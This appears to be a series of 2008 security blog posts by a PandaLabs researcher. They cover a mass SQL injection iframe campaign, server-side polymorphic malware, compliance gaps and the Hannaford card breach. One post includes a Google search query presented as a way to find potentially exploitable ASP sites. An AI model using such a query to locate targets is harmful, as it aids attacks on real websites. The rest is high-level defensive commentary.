SC Magazine Pod-Cast on Massive SQL Injection Attack

April 30, 2008

Yesterday Chuck Miller from SC Magazine published a podcast in which I spoke about the details of the latest mass web hack covered earlier. PandaLabs had confirmed that there was no IIS vulnerability involved in this latest round of attacks, rather poorly written .ASP code was the culprit.

However; it’s extreamly important to understand that we are talking about hundreds of thousands of sites that fell victim including the Department of Homeland Security and the United Nations. Thus, we really need to start raising awareness that security must be built into the code from the start to prevent such situations from occuring.

The pod-cast can be found at http://podcasts.scmagazine.com/


Massive iframe hack: The conclusions

April 28, 2008

Perception vs. Reality

 

It may seem that things are getting better and cyber-crime may be diminishing, but the evolution of hacking for profit will remain constant through the remainder of this year.

 

Data breaches are becoming a commonplace and corporate CIOs are focusing their attention towards protection of critical assets, especially external facing applications that are subject to a number of specialized attacks.

 

We have seen the explosion of high-profile hacks targeting external facing web applications and exploiting vulnerabilities to allow hackers to gain access to private and sensitive information.

 

These attacks are getting better and more sophisticated by the day. Some of these attacks are using complex SQL injection techniques to manipulate web-sites ranging from a simple insert of a malicious iframe tag to a complete compromise of a web server.

It’s interesting to see the number of web sites that are vulnerable to attacks and that such target sites can easily be found by searching for specific strings within Google (http://www.google.com/search?q=inurl:”.asp” inurl:”a=”) that will reveal if they are potentially exploitable. That’s exactly how the hackers automated a massive web hacking campaign that affected over a half million web-sites including the Department of Homeland Security and the United Nations web-sites.

A crafted SQL statement was used to compromise the web site and insert a malicious java script that untimely attempted to exploit several already known vulnerabilities within Microsoft Windows and install malware on visitors PCs. In other words the hackers found a way to generically infect hundreds of thousands of web-sites automatically using a similar statement.

 

According to the Identity Theft Resource Center (IRTC) the number of data breaches for 2008 has nearly exceeded the combined total of 2007; which obviously raises the question on why internal controls are failing to ensure the safety of critical assets in the time of a breach.

 

So why are internal controls failing? Thoughts?


Crimeware as a Service (CaaS) Updated

April 28, 2008

As the malware threat landscape continues to evolve, hackers are constantly changing techniques to counteract detection technologies that vendors are developing. By using sophisticated methods to evade current antivirus technologies, hackers are relentless in their pursuit of damaging IT systems and oftentimes gaining access to personal information.

 

Several years ago, hackers used polymorphism and metamorphism as tactics to constantly generate new variants of worms. Essentially, through polymorphism the virus would morph itself into different variations and successfully bypass signature-based technologies. The antivirus industry eventually responded to polymorphism by creating emulation technologies to counteract this new breed of virus. Essentially the emulation engine was designed to mimic the properties of the morphed virus so it could be detected by other means (signature and heuristics). This emulation approach all depended on the researcher’s access to the polymorphic engine, thus, the logic needed to be decoded before one was able to provide protection for specific mutations.

Subsequently, proactive technologies were developed (behavioral, heuristics) when worms began to self-replicate across networks and exploit zero-day vulnerabilities faster than a signature could be created. The idea was to provide protection, but without depending solely on reactive technologies which were slow and clunky, rather the use of innovative methods that attempt to predict dangerous characteristics. Heuristics really was the first stride towards being proactive by using a statistical probability model to calculate a file’s potential of being bad. However; in today’s world, malware is run by organized criminals who have simply adapted to the technologies that vendors have developed over the years.

As the malware landscape has evolved, hackers are shifting their interests from fame to profit and will do anything for financial gain by developing new and innovative ways to slip below the radar. Some of these methods are very innovative and are certainly thinking out of the box when it comes to crime. Such as:

· Custom HTML injection into financial sites to obtain additional information

As we begin to map out the evolution there are several common themes when it comes to stealth and camouflage techniques:

· Custom run-time packers

· Server-side polymorphism

· Virtual machine / sandbox detection

In the lab we have discovered that approximately 90 percent of all malware use some form of packers and the trend indicates they are becoming more customized by the day, therefore making the analyst’s job harder. The reason packers are being used as compressing the code prevents AV analysts from easily decoding the sample, thus, increasing reaction time dramatically. AV vendors are constantly evolving generic unpacking routines (techniques which decompress the file and reveal the malware) in order to combat the rise of packers.

Finally, we have found the emergence of server-side polymorphism or “Crime-Ware as a Service (CaaS)” as described by the industry, in which the polymorphic engine does not reside within the virus code itself, rather remotely on a server. There are two forms of server-side polymorphism that we know of today; the type that distributes mutated variations of malware into the wild in volume and PCs that are part of a bot-net and the specific bot variant can mutate remotely via a command over HTTP. This is called crime-ware as a service because the actual viral code does not actually preside on the host, but in the cloud similar to a software-as-a-service platform. In other words CaaS provides malware on demand to the infected host.

This methodology has proven to be quite effective and difficult to counter-act when it comes down to the traditional anti-malware model. Server-side polymorphism is so hard to detect because the transformation function (the routines used to change the signature of the code) are not visible to the virus analyst. Therefore, the actual algorithms or techniques that are involved in this process can not be studied to the degree necessary to create an effective vaccination. Bot-net communication is often encrypted as a defense mechanism to prevent the easy discovery of the command and control server dishing out the mutated malware. Therefore; these attacks using server side polymorphism often succeed in infected their target while flying under the radar.

The best bet for stopping server-side polymorphism is through the use of host-based intrusion prevention technologies, better known as HIPS. HIPS are designed for security over host-based systems where intrusions and infections are dealt with at each individual workstation. They are widely regarded by security experts as a more effective safeguard against malware. HIPS solutions are only as effective to the degree that they implement multiple layers of inspection ranging from the network stack to the application layer using proactive technologies (heuristics, behavioral analysis, behavioral blocking, etc) to provide a holistic view of the threat at hand.


Security Shouldn’t Take a Backseat to Virtualization

April 28, 2008

There’s no question that advances in server virtualization technology are becoming popular among corporations that want to save money by consolidating resources and improving operational efficiency. Virtualization enables a dramatic increase in cost savings in ongoing maintenance and the cost required to keep physical assets afloat.?

These benefits are often seen by CIOs and other information technology leaders as adding tremendous value to an existing robust IT infrastructure. Who wouldn’t want to save money by reducing the size and extent of their data center, especially in the manufacturing and financial services industries?

 
See the complete article at Virtualization Journal?


Regulatory Compliance & The Real Risk of Undetected Malware: Part 2

April 18, 2008

I am working on a white-paper that covers the disconnect between formal audit process and the technical safeguards implemented to ensure internal controls are adequate.  As you may have read part 1 of this article series and how I talked about the missing element, this is a continuation delving deeper into the problem. Thoughts? Comments?

 

“In the wake of undisclosed data breaches and public information exposure, regulatory compliance and security audit standards are becoming ever more important to protecting critical assets.

 

However; despite this recent upsurge in attacks internal controls seem to fail when it comes to the assurance that critical assets remain uncompromised. Therefore; better standards need to be developed and taken into consideration when going through the formal process to become SOX, GLB, PCI or HIPAA compliant.

 

This is crucial especially taking into consideration that criminals are in it for monetary gain, in other words we have an evolution towards hacking for profit that completely changes the rules of the game.

 

Corporations just can’t afford to take short-cuts when it comes to information assurance; otherwise it is almost certain that one will become a victim of a serious exposure of private and confidential data. This paper will explore the several disconnects between established and accepted security audit framework and the factor of unnoticed infection points

 


Sever-Side Polymorphism or Crime-ware as a Service (CaaS)

April 16, 2008

As the threat-landscape is evolving hackers are constantly changing technique in order to counter-act detection technologies that vendors develop. I remember a few years ago when polymorphism and metamorphism were used as a way to constantly generate new variants of worms.

 

Essentially the virus morphed itself into different variations and successfully evaded signature based technologies. Eventually the anti-virus industry responded through the creation of emulation technologies to counteract this new breed of virus.

 

Subsequently proactive technologies were developed (behavioral, heuristics, etc) when worms began to self-replicate across networks and exploit 0-day vulnerabilities faster then a signature could be created. However; in today’s world malware is run by organized crime and has simply adapted to the technologies that vendors have developed over the years.

 

As we are already familiar with the shift from fame to profit, hackers will do anything to make a buck these days by developing new and innovative ways to slip below the radar. Some of these methods are very innovative and are certainly thinking out of the box when it comes to crime.

 

As we begin to map out the evolution there are several common themes when it comes to stealth and camouflage techniques:

 

  • Custom run-time packers
  • Server-Side polymorphism
  • Virtual machine / sandbox detection

According to PandaLabs approximately 90% of all malware use some form of packers and the trend indicates they are becoming more customized by the day, therefore; making the analyst’s job harder.

 

Furthermore; we have the emergence of server side polymorphism or as described by the industry “Crime-Ware as a Service (CaaS)” which the polymorphic engine does not reside within the virus code itself, rather remotely on a server.

 

This methodology has proven to be quite effective and difficult to counter-act when it comes down to the traditional anti-malware model. The reason why server-side polymorphism is so hard to detect is the transformation function (the routines used to change the signature of the code) will not be not visible to the virus analyst and therefore; the actual algorithms or techniques that are involved in this process can’t be studied to the degree necessary to create an effective vaccination.

 

Server-side polymorphism will open the door to all sorts of problems from the increase in targeted attacks to undisclosed data breaches if corporations do not take a holistic approach to end-point security.

 

Your best bet for stopping server-side polymorphism is through the use of host based intrusion prevention technologies or HIPS as we call it.  So what do we define as HIPS? Well according to analyst Neil McDonald from Gartner HIPS is comprised of several different technologies from attack-facing network inspection to behavioral containment.


The Hannaford hack: what we can learn from it

April 5, 2008

Most people have heard of by now the recent high-profile data security breach with retail chain Hannaford Bros. According to an article published by SC Magazine (http://www.scmagazineus.com/Hannaford-tells-regulators-how-breach-happened/article/108569/) hackers placed hidden malware on nearly 300 servers to intercept transactions.

 

This malware was designed to locate and discover credit card information from consumers who interacted with the stores, thus, these hackers untimely harvested 4.2 million credit card numbers over a period of 3 months.

 

What a knock-out that was!

 

The question we have to ask is why didn’t their current anti-virus / anti-malware solution not detect the malware for 3 months? That’s a great question; most people today are living under the assumption that they are well protected from the dangers of the Internet just because their AV solution say’s it’s up to date and that they have enabled their firewalls.

 

Its unfortunate the traditional signature based anti-malware model is crumbling under the shear force of numbers (the rapid pace of new malware created daily). Thus, the industry has to take a holistic approach to solving this problem by using many different layers including proactive technologies.

 

Ideally if a proactive approach were taken to continuously monitor critical assets the situation could have potentially been avoided altogether. In closing this is a very real example of how even the most thought to be secure environment can be breached by hackers who have the drive and spirit to commit financial fraud. Let our lesson be learned.